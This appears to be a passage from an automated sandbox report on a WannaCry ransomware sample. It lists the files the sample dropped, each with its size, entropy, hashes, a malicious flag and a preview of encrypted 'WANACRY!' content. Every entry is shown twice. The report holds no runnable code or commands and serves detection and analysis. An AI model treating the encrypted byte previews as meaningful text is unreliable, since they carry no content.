                                                                                      Preview:WANACRY!.....L...R....X$...h....".B...0....T[.!.....O.1.|..5R..x.J.K...?r{....\.....[.~u;f.........v.=..j8.F.......|.....G...$.A...@.....l_OG..t.e.:jq..^.g.d...ENk-3zO.....7..8.1....fMWv...`-.\...K..S...c.oO..].Q.........$.....|(...D.E9`P$.g..6.../.cw.qb.......@........7}.....Q.Y..ulFJ..3u<M!.j.y=...^...0)..T.}Wr=._...|....:.]^8)~.. .gA......W....s....]...Q4K..L....a...M.....|<.^..X.)C.pu~r..+i....Ix#t.v.m..5......#..T.t....P....#..[........Y...~..p..5Ja.Uz...nzx.rs...K!l..w0..~..j1...Sf......c..}.V.H...-.......U.T.D..=c..9...k..,<1.......)....VG.)j...1...v4..I.@.".%V.1.~R..:B......Kn.5..nC.0..... .....X]d.wVEn.,.RVA...P....y..67F..}..T..b. .;..?.l...<...o......+.......;............O..]......%...]>......\d.V,....8X.+....F..".J......*;......I.<n.m...s.5.....85....C..i..k....M.*.*{..5..x......7C..{.ol..v.5Z....\v.K...j...."U.]...4m.V.M......./h.2.J.Z.c.(..X....R..(.p......p..........W...X'i...Y....."$.2....{z.d..a...m.c.i".+.....{P.Y'.-..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):49432
                                                                                      Entropy (8bit):7.996487270581623
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:F42i+QZjQIQ8Hf5Oox7ww77rYNu9xM1BBgg3:kVZjQ0HBT0w7l0n3
                                                                                      MD5:982D56819255459F759E8E1BFCF550A9
                                                                                      SHA1:243743FB516B3BEB42EC1DBAE9775390EDEA82E8
                                                                                      SHA-256:9260819B5456CD2C56C9E1B199FF0376EFF622ACDEE2D9B0DB800166F05FDA89
                                                                                      SHA-512:7E9846D752FD09A2EAACAEE26DD42D8AE50AF9E1415211FD6D16FF8A1BB940B7F83CD5CA8FA43ECA3A8CE9B691B9505B3912DEAE7DED3E5E7927D718448381EF
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Kf...@.R...u..F/....'O..E....R[m.T`.fS...R1..&......~.*.o......G....UT.+..-.....Q5KS.CF....u,..5.jzv?.......(..A. q....6.;.d..P.....$....^x..^......a.n...|...Ol.u.a......P2...0....uNU4...2..2.k..v..c...TsV....9.V..N1....y..^...g.{/..V..W..TV...............<=....h..l.x.;...u..Y-....h.$...z.....d..(..%.1FC..>S..oI._...>...........^.'..p.7k..8..s...6..........8..u+.uM5.M*.@,........U.....o..F._....g.r...yxy..i............{.*......&j}c.x..x.m..2(-A-...9.b...J.Xw..q..H.....UN...b..o]._.p..........Sqp_^\y.n..z.1(.-;..%2{$.._.....5^....0.J.a.....t..l....|{....<.NeC......I...$.N|@U....d...Z....7.u`.....}.....b....RG...:.yz.}_.C....b...5gHH.Hge..E..XW@.EH;........Q.P..)P....F...Le..r....1.v.>N..r.....K..C.]....J..r..U..ilt...x?|.'.3....w..>.;K.iZ...._.M.U...i.X.4'a..*..:4.ok..$.)s..%..|.....39...U.......Q+(j.(.ak..F..k*..L....n 40....(.3y.R.|..K.A!...}X.*;"G.....1.#.<^,...GK....L.W.8x1).A."T.O.*..v.n.J.......T...V;\.*.?
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):49432
                                                                                      Entropy (8bit):7.996487270581623
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:F42i+QZjQIQ8Hf5Oox7ww77rYNu9xM1BBgg3:kVZjQ0HBT0w7l0n3
                                                                                      MD5:982D56819255459F759E8E1BFCF550A9
                                                                                      SHA1:243743FB516B3BEB42EC1DBAE9775390EDEA82E8
                                                                                      SHA-256:9260819B5456CD2C56C9E1B199FF0376EFF622ACDEE2D9B0DB800166F05FDA89
                                                                                      SHA-512:7E9846D752FD09A2EAACAEE26DD42D8AE50AF9E1415211FD6D16FF8A1BB940B7F83CD5CA8FA43ECA3A8CE9B691B9505B3912DEAE7DED3E5E7927D718448381EF
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Kf...@.R...u..F/....'O..E....R[m.T`.fS...R1..&......~.*.o......G....UT.+..-.....Q5KS.CF....u,..5.jzv?.......(..A. q....6.;.d..P.....$....^x..^......a.n...|...Ol.u.a......P2...0....uNU4...2..2.k..v..c...TsV....9.V..N1....y..^...g.{/..V..W..TV...............<=....h..l.x.;...u..Y-....h.$...z.....d..(..%.1FC..>S..oI._...>...........^.'..p.7k..8..s...6..........8..u+.uM5.M*.@,........U.....o..F._....g.r...yxy..i............{.*......&j}c.x..x.m..2(-A-...9.b...J.Xw..q..H.....UN...b..o]._.p..........Sqp_^\y.n..z.1(.-;..%2{$.._.....5^....0.J.a.....t..l....|{....<.NeC......I...$.N|@U....d...Z....7.u`.....}.....b....RG...:.yz.}_.C....b...5gHH.Hge..E..XW@.EH;........Q.P..)P....F...Le..r....1.v.>N..r.....K..C.]....J..r..U..ilt...x?|.'.3....w..>.;K.iZ...._.M.U...i.X.4'a..*..:4.ok..$.)s..%..|.....39...U.......Q+(j.(.ak..F..k*..L....n 40....(.3y.R.|..K.A!...}X.*;"G.....1.#.<^,...GK....L.W.8x1).A."T.O.*..v.n.J.......T...V;\.*.?
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):11496
                                                                                      Entropy (8bit):7.984241088767678
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:KP0+wXiLe09qWZgAP7Vz3tSYjzPQjVBHq3/lrUSFOnXP+j76q+rdnDghcNvv3Yb9:Z+wyC0HCAPVcJjV9sNrUSaJmhfbg83se
                                                                                      MD5:97176E04655CCDD61AA222420D5DF342
                                                                                      SHA1:20D41C25210775C946C6AD89A1FEFA8557170343
                                                                                      SHA-256:0EB06377E7CC8AA7842BF01E610E953688B84869DB27FEEC6BDE2ACE74863C00
                                                                                      SHA-512:ED806E1E8BAF80118560423A0568C3634C8D48AE7DDA27481BBE9F2D63DB4C4FFACFC8AA5F57F684788158DB0C3DAEE8A73C6E18953F04466CDA65018AA975C5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......N6Y^H..{..5...UZ..J}..R.p..=.........(.....9.r.B.....YtgvQF0z..[..^\...p.a.s...+./..~.^....s.^...H%..C{~,.......%..eB........7.~.....8H..y.p....O......v~u7...q....L..~..f......_...:...|'.*..E!...).N..<x....Bl..o.C.....0I5rD......h.!..~..m.|.....+........Dl[....2.3!W...T.N.....XK ./..f..7...9t...D...p..s.eu.+p...~...~h...+_[X+.....k...O..bf.....,A.7....<.s..#.....o.......r`.)T%..K.|.R(..=.".H[..6......p.n$/.%1.w...,..C....M...m/zr.4p2.k...-}...\.....1wJ..R...h...j..I....{"....h.....E.-5^_..}Qg.o.t.>.a.6..0r=N...O.@N.M..w.....(.`C2.......l.:>...d...H.....y....qG..F..:A.....V...)J..Y.P(.%.}B..........I.........S}..ms.....Z.=..YzM..H......R....e^..X...F.....o ........,.W......J|..D..@....+..V.xc..?....A>!.[.'...D.._.......3..I.R.(.`.........#..zU...,..j.g.u......o!t....9-........5^3^.;.\.7....i.).+..n.g.....8. .9.g)...V.9;...4..W.....XC..eG....|.......V@b6ce..Q.~..B....i..#u.Y$..;~/..L@j..A.Z.?......n.F.$..U.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):11496
                                                                                      Entropy (8bit):7.984241088767678
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:KP0+wXiLe09qWZgAP7Vz3tSYjzPQjVBHq3/lrUSFOnXP+j76q+rdnDghcNvv3Yb9:Z+wyC0HCAPVcJjV9sNrUSaJmhfbg83se
                                                                                      MD5:97176E04655CCDD61AA222420D5DF342
                                                                                      SHA1:20D41C25210775C946C6AD89A1FEFA8557170343
                                                                                      SHA-256:0EB06377E7CC8AA7842BF01E610E953688B84869DB27FEEC6BDE2ACE74863C00
                                                                                      SHA-512:ED806E1E8BAF80118560423A0568C3634C8D48AE7DDA27481BBE9F2D63DB4C4FFACFC8AA5F57F684788158DB0C3DAEE8A73C6E18953F04466CDA65018AA975C5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......N6Y^H..{..5...UZ..J}..R.p..=.........(.....9.r.B.....YtgvQF0z..[..^\...p.a.s...+./..~.^....s.^...H%..C{~,.......%..eB........7.~.....8H..y.p....O......v~u7...q....L..~..f......_...:...|'.*..E!...).N..<x....Bl..o.C.....0I5rD......h.!..~..m.|.....+........Dl[....2.3!W...T.N.....XK ./..f..7...9t...D...p..s.eu.+p...~...~h...+_[X+.....k...O..bf.....,A.7....<.s..#.....o.......r`.)T%..K.|.R(..=.".H[..6......p.n$/.%1.w...,..C....M...m/zr.4p2.k...-}...\.....1wJ..R...h...j..I....{"....h.....E.-5^_..}Qg.o.t.>.a.6..0r=N...O.@N.M..w.....(.`C2.......l.:>...d...H.....y....qG..F..:A.....V...)J..Y.P(.%.}B..........I.........S}..ms.....Z.=..YzM..H......R....e^..X...F.....o ........,.W......J|..D..@....+..V.xc..?....A>!.[.'...D.._.......3..I.R.(.`.........#..zU...,..j.g.u......o!t....9-........5^3^.;.\.7....i.).+..n.g.....8. .9.g)...V.9;...4..W.....XC..eG....|.......V@b6ce..Q.~..B....i..#u.Y$..;~/..L@j..A.Z.?......n.F.$..U.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):33048
                                                                                      Entropy (8bit):7.994713003218214
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:WCg78DB5yNKGvptjeGQ3/BetYLhkCEKov6uO2/:FB5LGmGQ3c0hye2
                                                                                      MD5:1C317F4F94BE1311F99F3014235CB737
                                                                                      SHA1:8D0441EFAEF404F3E96736BEF9D20ACD553B43D3
                                                                                      SHA-256:CBD05000C44D7D3FAF218BDAA1C9692F6F41D8DE2EFDCA484C49A51F79513B1F
                                                                                      SHA-512:4292D073BB6C36439C633641C98B104902B6CE3696D693C72EF8AE3F76DA8E57323C6D986400E2A8388B88001A00ABA87FEDEFDC90108F0270F7D2CD1136D06C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......1-.x..W:0.......2.(?..A.)...+..QMA.>.../...t...Q9o.b..Y.."5..1.X.N.......;.B9......"A6b.tP..Vi.G.o...5..[3=!.y...<X....A..0P...mp..^?.q}..d.w...&..C.Es..;y.:.t.5G....".A...8... ........e.......e...<y..N..z..h...v*Z....*.....#.?.y7...;K.'..................`.Q.k.F].=..Z..?.r.../E.&P...U..j.N?..1,4...JL....}...X..........oL*.v8..,gg...n...?!..v[Q.)*....F..q.s...b.#p...~.. .\..S....s.q. ...=J^..r.1:.f..g..m.Tm......^qI.kl.....;..._...wV..<l .t...%~|.XvCw.. *pZ..bpy.%P....zb.....Z.r1.@..g/...oWP........!.eu:G.D.S.ESlx..&........I...)g.h.`.....W.../y.l.|...3|.%..g..O.......I.6q..u..Z....'.h..j...B.P....{....^.........y&y\..r..d......"..B-..Q.#.%O#.O.t..U:z.zB\D...:<"e.b.~O..f.A]....L."..5.q...D..33Vn.e.c.y8..U..Y.H.;.,!n.IRkR.......y\..B..d.m".iz..X.Z.[..-Lqn.B.F.x..oO.L..f1L......1..J.9.p.g....[...vf.!..#....pT.U....,....X6..&u..B.x....X.t..]...=i....\...?]c.?B.....P.....wc...M..%C2..3...{F..X..e.MM.A...j.......!.J.=X.z...O.k1.(......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):33048
                                                                                      Entropy (8bit):7.994713003218214
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:WCg78DB5yNKGvptjeGQ3/BetYLhkCEKov6uO2/:FB5LGmGQ3c0hye2
                                                                                      MD5:1C317F4F94BE1311F99F3014235CB737
                                                                                      SHA1:8D0441EFAEF404F3E96736BEF9D20ACD553B43D3
                                                                                      SHA-256:CBD05000C44D7D3FAF218BDAA1C9692F6F41D8DE2EFDCA484C49A51F79513B1F
                                                                                      SHA-512:4292D073BB6C36439C633641C98B104902B6CE3696D693C72EF8AE3F76DA8E57323C6D986400E2A8388B88001A00ABA87FEDEFDC90108F0270F7D2CD1136D06C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......1-.x..W:0.......2.(?..A.)...+..QMA.>.../...t...Q9o.b..Y.."5..1.X.N.......;.B9......"A6b.tP..Vi.G.o...5..[3=!.y...<X....A..0P...mp..^?.q}..d.w...&..C.Es..;y.:.t.5G....".A...8... ........e.......e...<y..N..z..h...v*Z....*.....#.?.y7...;K.'..................`.Q.k.F].=..Z..?.r.../E.&P...U..j.N?..1,4...JL....}...X..........oL*.v8..,gg...n...?!..v[Q.)*....F..q.s...b.#p...~.. .\..S....s.q. ...=J^..r.1:.f..g..m.Tm......^qI.kl.....;..._...wV..<l .t...%~|.XvCw.. *pZ..bpy.%P....zb.....Z.r1.@..g/...oWP........!.eu:G.D.S.ESlx..&........I...)g.h.`.....W.../y.l.|...3|.%..g..O.......I.6q..u..Z....'.h..j...B.P....{....^.........y&y\..r..d......"..B-..Q.#.%O#.O.t..U:z.zB\D...:<"e.b.~O..f.A]....L."..5.q...D..33Vn.e.c.y8..U..Y.H.;.,!n.IRkR.......y\..B..d.m".iz..X.Z.[..-Lqn.B.F.x..oO.L..f1L......1..J.9.p.g....[...vf.!..#....pT.U....,....X6..&u..B.x....X.t..]...=i....\...?]c.?B.....P.....wc...M..%C2..3...{F..X..e.MM.A...j.......!.J.=X.z...O.k1.(......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):20760
                                                                                      Entropy (8bit):7.99274564855935
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:C/RU/pfqBcLFH8J3o3c/hArnB0eyG1sUfTb43ejiqhbMamsyNrpQf:CZURfqSl8J3REB0fG1sSTb43+p4Tv2
                                                                                      MD5:13C815DD2608BFF29568A9D037BC9F05
                                                                                      SHA1:FA398D4005B3DAD73EB8268C80F1B7C56A267718
                                                                                      SHA-256:B960F4B1C4C0B4065BC93E7747F07304E2B5EE4886884B584BC4373571324FF8
                                                                                      SHA-512:43687D129CDAFA6860795C45344FBCDD82647979A5C4CF710C5271A7B9BF030264224DF54AD1DF7AC997F7E4881945633EBCAED61485F9D650F7AE7D67B74294
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......R.1wk*....Y.N...*^..M&....O...9.g...^".|$..9.q................R......H.\..*.0..ng.X...rp.\..a....jd..`..F...j.|P.X......d...4.p.wr..R..|..^[.....l...Z.jQ....w..4|.7...GZ.r=.'D..|.......d3..J..H^u(....?E.u.J....\..4.M.8....gWe.{Z-4......P.......#^i.rEZ.C...c.c.T-.#......S..r......)f.?.:...3..f8]Ev..E........Uw...Ui...!.U!.....9...xRI.U..m..R.!v...9..,.|..w4>n.[..C..}........*.....oN|8Z.'...p...!H.......qe....l..u...X...=..?a.`...C....~Z..O0O.].?U4.......6.ChCIp......r.4.2R.."C.^...e.~.Z...:.$f.\.n..].,L .r!a..Qb.x.l ....w..D9..<|@.n0x.....|.q..1E...v'..R8...b#.<...bO......H"2....9.....v....\uK...,F.......G.mE^..+.Ds.3.rm.Z.&t..<|.eD../.....t.q.L.sz_.F;..{D.........e...+.?.]....a.....0...l....b....L..0..,.t.j..?^f..[.b...3]GUW1^.6.J}.X1D.........x..Y.0.nr.lK~.#3h..........upSa8.......gt..KL>u.C#...../.r..Jp.4.W......#$..\..'._xC..[...."...1n........J...H.*+1..[9.v..{.\..+...m..R+%..R.=...?....+e.P+.....O...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):20760
                                                                                      Entropy (8bit):7.99274564855935
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:C/RU/pfqBcLFH8J3o3c/hArnB0eyG1sUfTb43ejiqhbMamsyNrpQf:CZURfqSl8J3REB0fG1sSTb43+p4Tv2
                                                                                      MD5:13C815DD2608BFF29568A9D037BC9F05
                                                                                      SHA1:FA398D4005B3DAD73EB8268C80F1B7C56A267718
                                                                                      SHA-256:B960F4B1C4C0B4065BC93E7747F07304E2B5EE4886884B584BC4373571324FF8
                                                                                      SHA-512:43687D129CDAFA6860795C45344FBCDD82647979A5C4CF710C5271A7B9BF030264224DF54AD1DF7AC997F7E4881945633EBCAED61485F9D650F7AE7D67B74294
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......R.1wk*....Y.N...*^..M&....O...9.g...^".|$..9.q................R......H.\..*.0..ng.X...rp.\..a....jd..`..F...j.|P.X......d...4.p.wr..R..|..^[.....l...Z.jQ....w..4|.7...GZ.r=.'D..|.......d3..J..H^u(....?E.u.J....\..4.M.8....gWe.{Z-4......P.......#^i.rEZ.C...c.c.T-.#......S..r......)f.?.:...3..f8]Ev..E........Uw...Ui...!.U!.....9...xRI.U..m..R.!v...9..,.|..w4>n.[..C..}........*.....oN|8Z.'...p...!H.......qe....l..u...X...=..?a.`...C....~Z..O0O.].?U4.......6.ChCIp......r.4.2R.."C.^...e.~.Z...:.$f.\.n..].,L .r!a..Qb.x.l ....w..D9..<|@.n0x.....|.q..1E...v'..R8...b#.<...bO......H"2....9.....v....\uK...,F.......G.mE^..+.Ds.3.rm.Z.&t..<|.eD../.....t.q.L.sz_.F;..{D.........e...+.?.]....a.....0...l....b....L..0..,.t.j..?^f..[.b...3]GUW1^.6.J}.X1D.........x..Y.0.nr.lK~.#3h..........upSa8.......gt..KL>u.C#...../.r..Jp.4.W......#$..\..'._xC..[...."...1n........J...H.*+1..[9.v..{.\..+...m..R+%..R.=...?....+e.P+.....O...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5272
                                                                                      Entropy (8bit):7.967104703413229
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:omr3sDWLrHNzVium7eAb9IvSZamFI3f8shLQ9IU3BgJRX7OUlI4Q:xvHBVvmiAb9yNWg0689IUeXLfm4Q
                                                                                      MD5:FA5F33AB19F2235A0829B2ADB9E01429
                                                                                      SHA1:B00E27BB451634F5188A0CCA2D243F99E36BF9DC
                                                                                      SHA-256:98D9DC16E7D0193949F560BF13ADC05EF6C2F08FC41730EFA81B7909C9C2CC5C
                                                                                      SHA-512:0DD20C33301615B5DF8DF7BA99992C1622A19855B50C4D4246B5A8579C37F2564AFAA54595675D6AE63ACCB327071D4872A944DD17B9ECA8DB103926011A8394
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....u.I....X....._..@..j$(...._.DF.....$t.p.}EP~..KZZ......o3.<>.y.OrP...Cx....u.*.X..^"..$.pd.Kp..k.a..=;m.~.2.1W......?f...a................u...Q8..:NC..~=GD.....|.8......tL]..Gm.2.V..(R..8..k..{_...K..G->.R[......U.,....o.l...Q...v...uutoTj.%...^....v..........Q..k^.g.QG>..xp.k...[N.F.../.....jF.O....]A]s.n..@...l..[@..A.C}......k.w.>...H.}...8.....I..l...Q.......Y.x...#..j....j.s.[k...Yv..*..O..?-U..)..4.75..m....%jt.S....y..i....JGO.f6.(........C../\.......8.\.6...j?Aw.K...&..4....n.q..8g.0.s...w$.a._:D.ARfc..9......V..&3{&l2_..,Z.iGb5.!.'!.9...FMU^.......s.?S......C.J.u....!$....,..I.V..y.,r...{...M.6:..IT.\s=2B....8....n-....w.V.!,k......A..(_,O.../.%...;...{.y.....'BwYFpH...s.t....t.0.18..#e..j..*.....Z)D\..-d.:Q.E...i...9.oHAu.........V.!]k.....M.2.,[.4"..{Q..J.@O".E..{.....*..#L...z.<.L|........|.*k.\..C.W..#cG_i.\4.b....Gns..U..tmg...H8.+...Q.SYO..zD......USA`......}`.....xfQ...~....Tq.\x.^.f.a.I..%.).g...../.T...i.p$..s.H.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5272
                                                                                      Entropy (8bit):7.967104703413229
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:omr3sDWLrHNzVium7eAb9IvSZamFI3f8shLQ9IU3BgJRX7OUlI4Q:xvHBVvmiAb9yNWg0689IUeXLfm4Q
                                                                                      MD5:FA5F33AB19F2235A0829B2ADB9E01429
                                                                                      SHA1:B00E27BB451634F5188A0CCA2D243F99E36BF9DC
                                                                                      SHA-256:98D9DC16E7D0193949F560BF13ADC05EF6C2F08FC41730EFA81B7909C9C2CC5C
                                                                                      SHA-512:0DD20C33301615B5DF8DF7BA99992C1622A19855B50C4D4246B5A8579C37F2564AFAA54595675D6AE63ACCB327071D4872A944DD17B9ECA8DB103926011A8394
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....u.I....X....._..@..j$(...._.DF.....$t.p.}EP~..KZZ......o3.<>.y.OrP...Cx....u.*.X..^"..$.pd.Kp..k.a..=;m.~.2.1W......?f...a................u...Q8..:NC..~=GD.....|.8......tL]..Gm.2.V..(R..8..k..{_...K..G->.R[......U.,....o.l...Q...v...uutoTj.%...^....v..........Q..k^.g.QG>..xp.k...[N.F.../.....jF.O....]A]s.n..@...l..[@..A.C}......k.w.>...H.}...8.....I..l...Q.......Y.x...#..j....j.s.[k...Yv..*..O..?-U..)..4.75..m....%jt.S....y..i....JGO.f6.(........C../\.......8.\.6...j?Aw.K...&..4....n.q..8g.0.s...w$.a._:D.ARfc..9......V..&3{&l2_..,Z.iGb5.!.'!.9...FMU^.......s.?S......C.J.u....!$....,..I.V..y.,r...{...M.6:..IT.\s=2B....8....n-....w.V.!,k......A..(_,O.../.%...;...{.y.....'BwYFpH...s.t....t.0.18..#e..j..*.....Z)D\..-d.:Q.E...i...9.oHAu.........V.!]k.....M.2.,[.4"..{Q..J.@O".E..{.....*..#L...z.<.L|........|.*k.\..C.W..#cG_i.\4.b....Gns..U..tmg...H8.+...Q.SYO..zD......USA`......}`.....xfQ...~....Tq.\x.^.f.a.I..%.).g...../.T...i.p$..s.H.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):80552
                                                                                      Entropy (8bit):7.997757393743349
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:pWidMzB2M17cVbJ/eHNZcWRSbNLWAAsAgtAkABdzfaMgZxMX:pWr828J/eHNZRyNaANAgtApBdzfaMYCX
                                                                                      MD5:D736F17D12B4FFE9FC4BE8AD55779451
                                                                                      SHA1:146CA1F8C6C72695888936FC197D7C1071F68E55
                                                                                      SHA-256:57A6240928258045C705506AFD58C57E4416D5914DC4B7F8414D357D447D6D83
                                                                                      SHA-512:DB2347D9BF44AD4FF7E0E937A13384CB755A194836392006D42924F0DEACC999B3E507400DAFE3022B3F8BD7D1DB1FCB804316A485D496F34A0BFBFF11B91F7B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d6...BG.-o.4.d.N._.\..g..7.Y]i.V...4...g.ci.!..){,....yS.......D.=U&.g1......!pS.%...Y.-......z..d*....U.5....lE..cH...4%......|.`6WY$..f..#+.7.l....r9);..50...W.t.X.r.GP.T..]..z_0.*z.....D.R..,..^.f.J..[~.:p....\...zA...s.$.Q$.T...2..H.......9......_Okd.....X9<.F.3....X..u.v.]...!U,...k....Y....Q.h[.R.[.e%.X.j.._i..&.M.Z..d7.....v...<....J.....9.v.|.i....7.....;..../..E$..t...3aa....,`i....<.)U....r....9..._..p|.oq.=...}/...NGQ...@...nd9...K.6.+Z.....X.....=.......#...=.v?T......ou..M...K...m.....WfpYn...aH|k.{.'yN..A...(....oi.H..l..i..r7...b.|.............o.....Q.X.d....!.d.LRi.Oc+..sZ>.9.q....T...2?...q.K....;..><......Dam.4ZU....K..D(WO.7.|..t....k....i.\...+p...3Q.C6K.r.sSl..I.........*..._..%..=....A.l.&.c....J.RZfl|..;...5.+.yW..m3=?.->...to.cs;...#...$.+.*>..Fgqks{:..0....l.5W.<5.4.t..E.........G....J&.I.k:.-.:...u.&.\QN.U9......u..^..o.R5..D.'.j!&.IE.[.84lLs....U...yY.+|..wK.?..e.DDb3j..p..M.c....7....+.1.G.?-.A.}q
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):80552
                                                                                      Entropy (8bit):7.997757393743349
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:pWidMzB2M17cVbJ/eHNZcWRSbNLWAAsAgtAkABdzfaMgZxMX:pWr828J/eHNZRyNaANAgtApBdzfaMYCX
                                                                                      MD5:D736F17D12B4FFE9FC4BE8AD55779451
                                                                                      SHA1:146CA1F8C6C72695888936FC197D7C1071F68E55
                                                                                      SHA-256:57A6240928258045C705506AFD58C57E4416D5914DC4B7F8414D357D447D6D83
                                                                                      SHA-512:DB2347D9BF44AD4FF7E0E937A13384CB755A194836392006D42924F0DEACC999B3E507400DAFE3022B3F8BD7D1DB1FCB804316A485D496F34A0BFBFF11B91F7B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d6...BG.-o.4.d.N._.\..g..7.Y]i.V...4...g.ci.!..){,....yS.......D.=U&.g1......!pS.%...Y.-......z..d*....U.5....lE..cH...4%......|.`6WY$..f..#+.7.l....r9);..50...W.t.X.r.GP.T..]..z_0.*z.....D.R..,..^.f.J..[~.:p....\...zA...s.$.Q$.T...2..H.......9......_Okd.....X9<.F.3....X..u.v.]...!U,...k....Y....Q.h[.R.[.e%.X.j.._i..&.M.Z..d7.....v...<....J.....9.v.|.i....7.....;..../..E$..t...3aa....,`i....<.)U....r....9..._..p|.oq.=...}/...NGQ...@...nd9...K.6.+Z.....X.....=.......#...=.v?T......ou..M...K...m.....WfpYn...aH|k.{.'yN..A...(....oi.H..l..i..r7...b.|.............o.....Q.X.d....!.d.LRi.Oc+..sZ>.9.q....T...2?...q.K....;..><......Dam.4ZU....K..D(WO.7.|..t....k....i.\...+p...3Q.C6K.r.sSl..I.........*..._..%..=....A.l.&.c....J.RZfl|..;...5.+.yW..m3=?.->...to.cs;...#...$.+.*>..Fgqks{:..0....l.5W.<5.4.t..E.........G....J&.I.k:.-.:...u.&.\QN.U9......u..^..o.R5..D.'.j!&.IE.[.84lLs....U...yY.+|..wK.?..e.DDb3j..p..M.c....7....+.1.G.?-.A.}q
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):584
                                                                                      Entropy (8bit):7.607255901396171
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEndHPtMjnM2JiAjA0EOc09oOlO+OCST6ywkNgZ7aSoQyJwe396TjqPqVy:bkUlMjnMtAjY50SOOL5T65kqopBITZy
                                                                                      MD5:068520C7F0ED59A458A715310E052A77
                                                                                      SHA1:A484D9FFB0A99A77E5C756FA37AC8E3C753B1C30
                                                                                      SHA-256:5B71B08D52C2C8D66EDE8976236E0EFE15E7B8CCF0D27A77BFB2F5FED92AF9BB
                                                                                      SHA-512:174DA4A47F781763CF3C30C6491B9FB0C5A8E228C480DC586B5ECEBAD63B55D8F910D8A0DCF6360545780B1807E046BCE2DEB31CF3DE2AA27D1F61DCEFF61BDE
                                                                                      Malicious:false
                                                                                      Reputation:low
